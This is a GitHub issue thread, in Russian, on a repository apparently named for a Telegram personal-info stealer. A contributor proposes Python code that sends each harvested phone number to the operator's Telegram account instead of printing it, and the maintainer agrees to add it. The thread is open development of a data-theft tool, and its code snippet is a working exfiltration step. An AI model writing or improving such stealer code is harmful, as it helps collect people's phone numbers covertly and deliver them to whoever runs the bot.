### ISSUE TITLE
Совет по улучшению

### ISSUE THREAD

**Issue by htmlcssphpjs** [MrProCatYT/PersonalInfoStealerTG#1]
Привет,
```python
def contact_handler(message):        
    print('Номер телефона:', message.contact.phone_number)
```
а не проще отправлять сообщение пользователю? Так удобнее, и вряд-ли потеряется)

```python
admin_id = 123456 #you telegram id 
bot.send_message(admin_id, 'Номер телефона:' + message.contact.phone_number)
```

А ещё я бы чуть украсил, вот как пример: https://github.com/htmlcssphpjs/Ph0nest/blob/main/Ph0nest.py

**Comment by MrProCatYT** [comment]
Привет! Спасибо за совет! Выглядит интересно, скорее всего добавлю :)
